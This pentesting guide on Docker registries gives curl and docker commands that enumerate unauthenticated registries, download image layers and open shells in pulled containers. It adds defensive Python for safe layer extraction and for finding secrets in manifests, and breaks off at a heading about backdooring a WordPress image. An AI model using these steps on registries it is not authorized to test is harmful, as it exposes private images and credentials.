A storage and distribution system known as a Docker registry holds Docker images, which are named and may exist in several versions distinguished by tags. These images are organized into Docker repositories within the registry, each repository storing the various versions of a specific image. Images can be downloaded locally or uploaded to the registry, provided the user has the necessary permissions.
DockerHub serves as the default public registry for Docker, but users can also run an on-premise instance of the open-source Docker registry/distribution or opt for the commercially supported Docker Trusted Registry. Various other public registries can also be found online.
To download an image from an on-premise registry, the following command is used:
docker pull my-registry:9000/foo/bar:2.1
This command fetches version 2.1 of the foo/bar image from the on-premise registry at the my-registry domain on port 9000. Conversely, to download the same image from DockerHub, particularly if 2.1 is the latest version, the command becomes:
docker pull foo/bar
Default port: 5000
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
Discovery
The easiest way to discover that this service is running is to find it in the nmap output. However, note that because it is an HTTP-based service it can sit behind HTTP proxies, and nmap will not detect it.
Some fingerprints:
Docker registry may also be configured to require authentication:
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}
If the Docker Registry requires authentication, you can try to brute-force it using this.
If you find valid credentials, you will need to use them to enumerate the registry; in curl you can use them like this:
Once you have access to the docker registry, here are some commands you can use to enumerate it:
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}

#Get tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}

#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
{"schemaVersion":1,"name":"ubuntu","tag":"latest","architecture":"amd64",
"fsLayers": [{"blobSum":"sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"},
{"blobSum":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},
{"blobSum":"sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"}],
"history": [{"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d 
\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
},{"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},{"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
}],"signatures": [{"header":{"jwk":{"crv":"P-256","kid":"DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX","kty":"EC","x":"leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg","y":"Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"},"alg":"ES256"},"signature":"GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q","protected":"eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"}]}

#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar

#Inspect the insides of each blob
tar -xf blob1.tar #After this, inspect the new folders and files created in the current directory
Note that when you download and decompress the blob files, files and folders will appear in the current directory. If you download all the blobs and decompress them in the same directory, they will overwrite values from the previously decompressed blobs, so be careful. It may be worth decompressing each blob inside a different directory so you can inspect the exact content of each blob.
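One way to follow this advice, as an added example that is not part of the original page: each blob is checked against the blobSum listed in the manifest and unpacked into its own directory, skipping links and names that would land outside it. `extract_layer` and `make_layer` are hypothetical names, and the two layers in the demo are constructed in memory.

```python
import hashlib
import io
import os
import tarfile
import tempfile


def extract_layer(blob: bytes, blob_sum: str, out_root: str) -> list:
    """Verify one layer blob against its manifest digest, then unpack it
    into its own directory under out_root so layers never overwrite each other."""
    algo, _, expected = blob_sum.partition(":")
    if algo != "sha256" or hashlib.sha256(blob).hexdigest() != expected:
        raise ValueError("digest mismatch for " + blob_sum)
    dest = os.path.realpath(os.path.join(out_root, expected[:12]))
    os.makedirs(dest, exist_ok=True)
    written = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for member in tar:
            target = os.path.realpath(os.path.join(dest, member.name))
            # Only regular files, and only inside dest: links, devices and
            # "../" or absolute names from an untrusted layer are skipped.
            inside = os.path.commonpath([dest, target]) == dest
            if not inside or not member.isfile():
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(member) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, dest))
    return sorted(written)


def make_layer(files: dict) -> bytes:
    """Build a constructed in-memory layer tarball for the demo below."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    root = tempfile.mkdtemp(prefix="layers-")
    for files in ({"etc/app.conf": b"v1"}, {"etc/app.conf": b"v2", "../escape": b"x"}):
        blob = make_layer(files)
        digest = "sha256:" + hashlib.sha256(blob).hexdigest()
        print(digest[:19], extract_layer(blob, digest, root))
```

Both constructed layers contain etc/app.conf, and each copy survives in its own directory; the `../escape` entry is never written.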
Enumeration using docker
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu

#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE          CREATED       CREATED BY                                      SIZE     COMMENT
#ed05bef01522   2 years ago   ./run.sh                                        46.8MB
#<missing>      2 years ago   /bin/sh -c #(nop) CMD ["./run.sh"]              0B
#<missing>      2 years ago   /bin/sh -c #(nop) EXPOSE 80                     0B
#<missing>      2 years ago   /bin/sh -c cp $base/mysql-setup.sh /            499B
#<missing>      2 years ago   /bin/sh -c #(nop) COPY dir:0b657699b1833fd59…   16.2MB

#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
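The build commands that docker history prints are also recorded in a schema 1 manifest such as the one returned by /v2/ubuntu/manifests/latest above, so an image can be audited for credentials baked into its build steps without pulling it. The following is an added example, not code from the original page; `layer_commands`, `sample_manifest` and the `SECRET_HINT` pattern are hypothetical, and the sample manifest uses constructed placeholder digests.

```python
import json
import re

# Assumed heuristic for credentials baked into build steps (not exhaustive).
SECRET_HINT = re.compile(r"(passw(or)?d|secret|token|api[_-]?key)\w*=", re.I)


def layer_commands(manifest_text: str) -> list:
    """Pair each fsLayers digest with the build command recorded for it.

    In a schema 1 manifest, fsLayers and history are parallel lists ordered
    newest layer first, and each v1Compatibility value is itself a JSON string.
    Rows are returned oldest first, like reading a Dockerfile top to bottom.
    """
    manifest = json.loads(manifest_text)
    if manifest.get("schemaVersion") != 1:
        raise ValueError("not a schema 1 manifest")
    rows = []
    for layer, entry in zip(manifest["fsLayers"], manifest["history"]):
        compat = json.loads(entry["v1Compatibility"])
        cmd = " ".join(compat.get("container_config", {}).get("Cmd") or [])
        # Strip the shell wrapper Docker records for non-RUN instructions.
        cmd = cmd.replace("/bin/sh -c #(nop) ", "").strip()
        rows.append({
            "blobSum": layer["blobSum"],
            "command": cmd,
            "has_files": not compat.get("throwaway", False),
            "leaks_secret": bool(SECRET_HINT.search(cmd)),
        })
    return rows[::-1]


def sample_manifest() -> str:
    """Constructed three-layer manifest with placeholder digests."""
    steps = [  # newest first, as the registry returns them
        ("sha256:" + "c" * 64, "/bin/sh -c #(nop) CMD [\"./run.sh\"]", True),
        ("sha256:" + "b" * 64, "/bin/sh -c #(nop) ENV DB_PASSWORD=example", True),
        ("sha256:" + "a" * 64, "/bin/sh -c #(nop) ADD file:rootfs in / ", False),
    ]
    return json.dumps({
        "schemaVersion": 1, "name": "ubuntu", "tag": "latest",
        "fsLayers": [{"blobSum": d} for d, _, _ in steps],
        "history": [{"v1Compatibility": json.dumps(
            {"container_config": {"Cmd": [c]}, "throwaway": t})} for _, c, t in steps],
    })


if __name__ == "__main__":
    for row in layer_commands(sample_manifest()):
        print(row["blobSum"][:19], row["has_files"], row["leaks_secret"], row["command"])
```

Rows with `has_files` set to False are metadata-only steps, so only the remaining blobs are worth downloading for file-level review.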
Backdooring WordPress image
In the scenario where you have found a Docker Registry saving a wordpress image, you can backdoor it.
Create the backdoor: